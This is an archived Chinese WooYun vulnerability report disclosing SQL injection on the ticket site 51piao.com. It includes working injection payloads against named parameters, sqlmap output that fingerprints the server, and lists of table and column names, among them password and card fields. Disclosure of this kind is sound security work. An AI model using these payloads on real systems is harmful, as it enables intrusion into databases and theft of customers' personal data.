乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-20: 厂商已经主动忽略漏洞,细节向公众公开
搜索了,没有提交重复吧!~~~
首先,地址是
http://www.51piao.com/Ticket/TicketList.aspx?cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
多个参数存在注入,cityid,ticketaddrid,name
http://www.51piao.com/Ticket/TicketList.aspx?cityid=157'&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
测试返回结果
“/”应用程序中的服务器错误。第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by [BeginDate] asc' 之前有未闭合的引号。说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 异常详细信息: System.Exception: 第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by [BeginDate] asc' 之前有未闭合的引号。
这样应该是有注入了吧!~~~
sqlmap identified the following injection points with a total of 509 HTTP(s) requests:---Place: GETParameter: cityid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cityid=157) AND 6477=6477 AND (9107=9107&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cityid=157) AND 6063=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6063=6063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))) AND (1862=1862&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2= Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: cityid=-1157) UNION ALL SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(87)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(88)+CHAR(106)+CHAR(79)+CHAR(119)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113)-- &ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cityid=157); WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cityid=157) WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=Place: GETParameter: name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=%' AND 4525=4525 AND '%'='&style=&sort=3&price1=&price2=&day1=&day2=Place: GETParameter: ticketaddrid Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: cityid=157&ticketaddrid=(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7962=7962) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: cityid, type: Unescaped numeric (default)[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric[2] place: GET, parameter: name, type: Single quoted string[q] Quit> 0[23:39:41] [INFO] testing Microsoft SQL Server[23:39:41] [INFO] confirming Microsoft SQL Server[23:39:42] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000Database: www_51piao_com+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.OrderLog | 960530 || dbo.TicketPrice | 370802 || dbo.vMemberAll | 341320 || dbo.vTicketPrice | 248386 || dbo.MemberAddrBook | 205920 || dbo.Member | 198769 || dbo.vMember | 198769 || dbo.OrderMain | 179354 || dbo.OprLog | 178047 || dbo.vEmailAll | 130008 || dbo.MemberPointLog | 126478 || dbo.TicketOrderDetail | 124531 || dbo.vTicketOrderStat | 124531 || dbo.vFlightTicketOrder | 121509 || dbo.SmsLog | 110875 || dbo.TicketOrder | 105987 || dbo.vTicketOrder | 105987 || dbo.vMobileTemp | 98091 || dbo.vMoibleAll | 98091 || dbo.vMobileAllOrder | 98081 || dbo.vMemberTemp | 93102 || dbo.MemberMoneyLog | 81837 || dbo.TicketPlay | 81605 || dbo.VTicketPlayMag | 81559 || dbo.FlightLog | 72994 || dbo.TrainNew | 70195 || dbo.vLoginLog | 58650 || dbo.ImagesTicket | 37724 || dbo.monitor | 36593 || dbo.FlightOrderDetail | 31300 || dbo.vFlightOrderDetail | 21042 || dbo.FlightOrder | 15522 || dbo.vFlightOrder | 15522 || dbo.Ticket | 14240 || dbo.vTicket | 14124 || dbo.vTicketDetail | 14124 || dbo.vTicketMag | 14124 || dbo.OrderPayCard | 13596 || dbo.vOrderPayCard | 13596 || dbo.MemberLog | 11971 || dbo.vFlightTicketSend | 10293 || dbo.AccountAll | 8329 || dbo.TicketPreOrder | 6289 || dbo.vTicketAddrUse | 5215 || dbo.FlightLogStat | 2756 || dbo.TicketReview | 2220 || dbo.vTicketReviewList | 1808 || dbo.FlightKM | 1398 || dbo.o_kehu | 1317 || dbo.ImagesCommon | 860 || dbo.WebTop | 858 || dbo.JOYCOMPANY | 786 || dbo.vJoyCompany | 786 || dbo.VJoyCompanyMag | 786 || dbo.LinkInfo | 780 || dbo.CITY | 647 || dbo.AgentInfo | 526 || dbo.VChinaCity | 455 || dbo.NewsHelp | 431 || dbo.vNewsHelp | 416 || dbo.VNewsHelp1 | 416 || dbo.PointProductOrder | 293 || dbo.vTicketBig | 280 || dbo.vTicketHomeTop | 279 || dbo.MemberWebUnion | 210 || dbo.vTicketLeft | 176 || dbo.vTicketSmall | 155 || dbo.FlightCityCode | 152 || dbo.FlightSale | 144 || dbo.VFlightSale | 141 || dbo.Area | 131 || dbo.Users | 116 || dbo.vUserMag | 116 || dbo.BlackIp | 103 || dbo.REGION | 96 || dbo.PointProduct | 84 || dbo.TrainTrade | 65 || dbo.vTrainTrade | 65 || dbo.TrainTradeBak | 60 || dbo.NewsHelpModule | 57 || dbo.sysconstraints | 54 || dbo.vPointProduct | 44 || dbo.vPointProduct1 | 44 || dbo.TravelLine | 35 || dbo.vTravelLine | 35 || dbo.VTravelLine1 | 35 || dbo.vTravelLineDetail | 35 || dbo.Province | 34 || dbo.vMobileAllTrain | 26 || dbo.vTicketTypeCount | 22 || dbo.TempSql | 17 || dbo.vJoyCompanyTop | 17 || dbo.TicketType | 14 || dbo.vTicketType | 14 || dbo.OrderPayMethod | 12 || dbo.FlightSpec | 11 || dbo.vFlightSpec | 11 || dbo.MemberGroup | 10 || dbo.SmsTemplate | 10 || dbo.vSmsTemplate | 10 || dbo.vTemp | 10 || dbo.BaseCreditCard | 9 || dbo.WebModule | 9 || dbo.vWebCity | 8 || dbo.WebCity | 8 || dbo.BlackList | 7 || dbo.SmsEvent | 7 || dbo.BbsBanner | 6 || dbo.Groups | 6 || dbo.OrderFlightTakeAddr | 6 || dbo.PointProductType | 5 || dbo.vHomeTicket | 5 || dbo.vSmsModule | 5 || dbo.HotelOrder | 4 || dbo.vHotelOrder | 4 || dbo.syssegments | 3 || dbo.BaseYesNo | 2 || dbo.FlightTicketAddr | 2 || dbo.PriceType | 2 || dbo.CompanySeq | 1 || dbo.FlightSaleTop | 1 || dbo.OrderSeq | 1 || dbo.TravelCompany | 1 |+-------------------------+---------+| dbo.Member | 198769 || dbo.vMember | 198769 || dbo.Users | 116 || dbo.vUserMag | 116 |Database: www_51piao_comTable: Users[9 columns]+---------------+| Column |+---------------+| Account || ID || IsDisabled || LastLoginTime || LEVELID || LoginCount || Password || PurView || UserName |+---------------+Database: www_51piao_comTable: vUserMag[10 columns]+---------------+| Column |+---------------+| Account || DepartName || ID || IsDisabled || LastLoginTime || LEVELID || LoginCount || Password || PurView || UserName |+---------------+Database: www_51piao_comTable: Member[43 columns]+---------------+| Column |+---------------+| Account || Address || Balance || BirthDay || CardNo || CardType || CityId || COMPANYADDR || CompanyId || CompanyName || COMPANYTEL || CompanyType || Degree || Email || FAX || GroupId || ID || ISAuditing || IsBindMobile || IsChinese || IsDesignWeb || IsDisabled || IsMailList || IsWeb || LastLoginTime || LoginCount || MemberType || MEMO || MOBILE || Name || NickName || openid || POINT || ProvinceId || Pwd || RegDate || SEX || STAFFID || STAFFNAME || TEL || VipMoney || VipNo || ZIPCODE |+---------------+Database: www_51piao_comTable: vMember[45 columns]+---------------+| Column |+---------------+| Account || Address || Balance || BirthDay || CardNo || CardType || City || CityId || COMPANYADDR || CompanyId || CompanyName || COMPANYTEL || CompanyType || Degree || Email || FAX || GroupId || GroupName || ID || ISAuditing || IsBindMobile || IsChinese || IsDesignWeb || IsDisabled || IsMailList || IsWeb || LastLoginTime || LoginCount || MemberType || MEMO || MOBILE || Name || NickName || openid || POINT || ProvinceId || Pwd || RegDate || SEX || STAFFID || STAFFNAME || TEL || VipMoney || VipNo || ZIPCODE |+---------------+
数据挺大的,就不继续了!~~~~
如上
过滤修复!~~~
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)